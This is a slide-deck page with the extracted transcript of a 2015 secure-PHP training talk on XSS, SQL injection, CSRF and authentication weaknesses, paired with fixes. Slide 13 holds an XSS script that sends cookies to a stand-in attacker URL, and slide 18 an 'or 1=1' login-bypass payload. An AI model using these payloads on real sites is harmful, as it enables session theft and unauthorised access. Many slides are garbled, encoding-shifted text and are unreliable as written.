Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Secure PHP Bootcamp

224dac66704579d941e927965a6220a2?s=47 Chris Cornutt
January 23, 2015
Technology
0
360

Secure PHP Bootcamp

Given at PHP Benelux 2015

224dac66704579d941e927965a6220a2?s=128

Chris Cornutt

January 23, 2015
Tweet

More Decks by Chris Cornutt

See All by Chris Cornutt
224dac66704579d941e927965a6220a2?s=48 ccornutt
0
65
224dac66704579d941e927965a6220a2?s=48 ccornutt
0
62
224dac66704579d941e927965a6220a2?s=48 ccornutt
1
120
224dac66704579d941e927965a6220a2?s=48 ccornutt
0
250
224dac66704579d941e927965a6220a2?s=48 ccornutt
0
140
224dac66704579d941e927965a6220a2?s=48 ccornutt
0
110
224dac66704579d941e927965a6220a2?s=48 ccornutt
0
94
224dac66704579d941e927965a6220a2?s=48 ccornutt
0
32
224dac66704579d941e927965a6220a2?s=48 ccornutt
0
190

Other Decks in Technology

See All in Technology
9a883e4b99553b96d3ecf5a47aa6f233?s=48 khrd
1
550
59fbf50f41bdd0ed0e3bbf27859bf99d?s=48 pg0084
1
130
Cc568a0b1284645f9fb927b2343eb87e?s=48 youtalk
0
380
8b0e9a3684bd29ecece29db2582e38ae?s=48 norioikedo
0
220
D9e65f4b0af059ae9ba243c8c2265e4f?s=48 pohjus
0
3.3k
A64ac825509279a770c13c6fc517f11a?s=48 kawaguti
2
420
4b2f3a64637b51e81813accbe8a98083?s=48 miura55
0
310
3f848c0c0b9a6603894e157da93e4655?s=48 sadayoshitada0919
0
300
Ff7f1f76468f46a1c5c84b9238a4b162?s=48 miyake
1
420
19fc8f6113c5c3d86e6176362ff29479?s=48 kanaugust
PRO
0
130
1bfc6e2ed04a895bb36f36b86828b689?s=48 110y
1
11k
53850955f15249a1a9dc49df6113e400?s=48 line_developers
PRO
0
170

Featured

See All Featured
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
10
1.5k
B3d6434763caa0ef5dc4b792662c49f7?s=48 smashingmag
230
18k
E4f5d494ebdc9e7cce1aecf3ce3e8bc1?s=48 shpigford
165
19k
96270e4c3e5e9806cf7245475c00b275?s=48 addyosmani
1346
190k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
779
240k
1519587b1a0febb658c36c94f6272b0d?s=48 roundedbygravity
84
7.9k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
145
20k
C4de88ea47538e4594750e3861a341c8?s=48 brettharned
93
3k
761be20b5ebd271008bcee1244fc5b52?s=48 matthewcrist
73
7.5k
D36d2c1821af9249b69ff7f5ed60529b?s=48 tammielis
237
23k
462dad0dd24c568a32dcdb0ae895ae1b?s=48 rasmusluckow
318
18k
1f74b13f1e5c6c69cb5d7fbaabb1e2cb?s=48 sferik
610
55k

Transcript

  1. Secure PHP Development $ISJT$PSOVUU!FOZHNB

  2. https://jetbrains.com

  3. Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT

  4. 1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN

  5. IUUQCJUMZPXBTQUPQ

  6. 5IFSF`T OPTVDIUIJOH BTTFDVSF

  7. IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO

  8. IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN

  9. None

  10. XSS: Cross Site Scripting

  11. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH

  12. Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>

  13. Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);

    xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG

  14. Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );

    echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

  15. Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)

    }} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH

  16. SQLi: SQL Injection

  17. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH

  18. Example $sql = ‘select id from users where username =

    “‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #

  19. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH

  20. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X

  21. Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where

    username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

  22. CSRF: Cross Site Request Forgery

  23. VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF  TJNQMF SBOEPNJ[FE GPSFBDIGPSN

  24. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> </form>

  25. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>

  26. Auth*: Authentication & Authorization

  27. EJSFDUPCKFDUSFGFSFODF "  EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU

  28. QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT

  29. None
  30. None

  31. And…

  32. 4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

  33. 5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN